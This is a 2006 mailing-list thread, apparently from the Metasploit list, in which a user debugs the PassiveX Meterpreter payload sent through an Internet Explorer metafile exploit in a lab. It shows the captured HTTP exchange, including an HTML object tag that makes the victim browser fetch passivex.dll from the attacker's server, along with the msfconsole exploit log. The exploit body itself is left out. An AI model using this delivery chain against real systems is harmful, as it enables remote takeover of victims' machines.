Using the PassiveX payload

[featuremeister at googlemail.com (Feature Meister)]

Hi,

it seems as if the control does not get registered. At least there's
nothing like a "PassiveX.PassiveX" or "CPassiveX" registered under
HKEY_CLASSES_ROOT.
The account I am trying it with has administrative privileges.

Requests:
============================================================
1st request (client -> 192.168.71.75:80):

GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, */*
Accept-Language: de
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 192.168.71.75
Connection: Keep-Alive
============================================================
1st response:
HTTP/1.1 200 OK
[lots of garbled X-something headers]
Content-Type: text/plain
Content-Length: 1064
Connection: close

<html><meta http-equiv='refresh' content='0;
URL=http://192.168.71.75:80/oLS5EVfdp4EbzJ6E/tq0t6bYDRZpAW/VPQDnp1zZjLjxQhsbpWtWOzMYfVkt/qDEQ7gILJFcbnj4BFRE/HC4VS3s6WACBB/KIn3qj593.tiff&apos;><body><div
class='P0flswoP5lceERmtVti3aHyTGPAJp9i32I0IjMdj6MCwfOWf4Yj4qwrXIjY9OEbahogUa24mM8PTKuBTvan49hoFzD1D4WjQKF6Wey6yZjxeGUJ5RyKXUguwUL9EtJzYOZ7ZsoP3GQFQwsXH4Nz4jT3oSGsDXoEWyKTTkeLVFt7Sh1x6ZgmGTF7ZqyxaHLVcjsLkbMbaLtfHrcY7UuhGjRd1TgVGeJSBPskyOxkYQY4JXhLlAdMj8muvu9425ghD6rvPwHOKniXvqrfUyi1d8vnqB5o4M2fB29e0goJZljRLyb5FHTbFeSnKjYHivGCEMbfgxs5AhJGVeEOZZGA6pVuwDTJJ4qeL7yjvgprs84y1RuQ58aKB9amhb1LP1irBSv3mckOlVnEmQCka8K9xWBbRzI30mlTl1eHz12RVnajohpIW7iye4eEPvjM6ytFjKLmfwXNYrnhnIzuDtThTbc9yFqfIRfbXh2b1if2IkYPnvjfB2W46psjTUhXnmbFJtOemNuuvXTjg7yHSRwOtQl65umdKe33UPvWR7OVKLdxkDb9vkX9XbuT0tT5a6bvBU4eHZq7ljrSvfBdbod9Vmf7d71xUWDzKij3QLdiUEJaOJip3rQfiWket98Q0nnkZQdLKEAFBWJcdu5bZwXq9ga7iZssqrZXweGRTkI3NPWmtYWHgoKLgwwFhkThZfnyBrWSdJHiWgKJCYgOLKBDoJGdh5G3nVJjzEwM5jZ2Lfakd2s5O9cmcA71soVObXYGqrhjSRDPZfa1E0mknvV4bHZTUORp70CqlD8Nir8JzBN2CAPE71q6o'></div>One
second please...</body></html>
============================================================

2nd request (C -> 192.168.71.75:80):
GET /oLS5EVfdp4EbzJ6E/tq0t6bYDRZpAW/VPQDnp1zZjLjxQhsbpWtWOzMYfVkt/qDEQ7gILJFcbnj4BFRE/HC4VS3s6WACBB/KIn3qj593.tiff
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, */*
Accept-Language: de
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 192.168.71.75
Connection: Keep-Alive

2nd response:
[lots of garbled X-something headers]
[metafile exploit]
============================================================
3rd request (C -> 192.168.71.75:8000):
GET / HTTP/1.1
Accept: */*
Accept-Language: de
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 192.168.71.75:8000
Connection: Keep-Alive

3rd response:
HTTP/1.1 200 OK
Connection: close
Content-type: text/html

<html><object classid="CLSID:B3AC7307-FEAE-4e43-B2D6-161E68ABA838"
codebase="http://192.168.71.75:8000/passivex.dll#-1,-1,-1,-1";><param
name="HttpHost" value="192.168.71.75"><param name="HttpPort"
value="8000"><param name="DownloadSecondStage"
value="1"></object></html>
============================================================
4th request (C -> 192.168.71.75:8000):
GET /passivex.dll HTTP/1.1

Accept: application/x-cabinet-win32-x86, application/x-pe-win32-x86,
application/octet-stream, application/x-setupscript, */*
Accept-Language: de
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 192.168.71.75:8000
Connection: Keep-Alive

4th response:
HTTP/1.1 200 OK
Connection: close
Content-type: application/octet-stream

[here comes passivex.dll]
============================================================

on MSFConsole I see:

msf ie_xp_pfv_metafile(win32_passivex_meterpreter) > exploit
[*] Starting PassiveX Handler on 192.168.71.75:8000.
[*] Waiting for connections to http://192.168.71.75:80/
[*] HTTP Client connected from 192.168.71.71:1078, redirecting...
[*] HTTP Client connected from 192.168.71.71:1079, sending 1452 bytes
of payload...
[*] Sending PassiveX main page to client...
[*] Sending PassiveX DLL in HTTP response (106496 bytes)...

I'm unsure if I should post the tcpdump (~ 60K compressed) to this list.

Marco

On 5/4/06, mmiller at hick.org <mmiller at hick.org> wrote:
> On Thu, May 04, 2006 at 05:02:55PM +0200, Feature Meister wrote:
> > Hi all,
> >
> > I am desperately looking for the PassiveX payload to work. I already saw
> > some earlier postings on this list regarding this topic and also read the
> > theory on "uninformed".
> > What I'm trying is the following setup:
> >
> > attackers machine (A):
> > OS: WinXP SP2 (de), no additional patches
> > Metasploit Framework 2.5
> > Exploit: ie_xp_pfv_metafile
> > Payload: win32_passivex_meterpreter (also win32_passivex_*)
> >
> > victims machine (V):
> > OS: WinXP SP2 (en-US), no additional patches
> >
> > Scenario:
> > When connecting to the HTTP-port provided by metasploit the victims machine
> > downloads and executes the exploit. It works since the IE zone settings are
> > changed as described. After that the exploit launches the hidden IE which
> > then downloads the passivex dll. (I verified this by sniffing the
> > connections)
> > But then nothing else happens. I would have expected the meterpreter console
> > coming up - but there's no more communication between A and V.
> > Any hints, suggestions, ideas?
>
> The only thing I can think of that would lead to this scenario is the
> ActiveX control not properly registering after it is downloaded.  Can
> you confirm that the PassiveX.PassiveX (may be CPassiveX...)
> class is getting registered?  You can check in in the registry under
> HKEY_CLASSES_ROOT.  If it is getting registered, then it seems like
> perhaps the PXHTTPHOST/PORT is not getting set properly, though that
> seems unlikely.
>
> Can you include the data portion of the HTTP response that the
> metasploit webserver sends to the client when it requests the root page?
> I'm mainly interested in seeing the parameters that are sent in the
> object.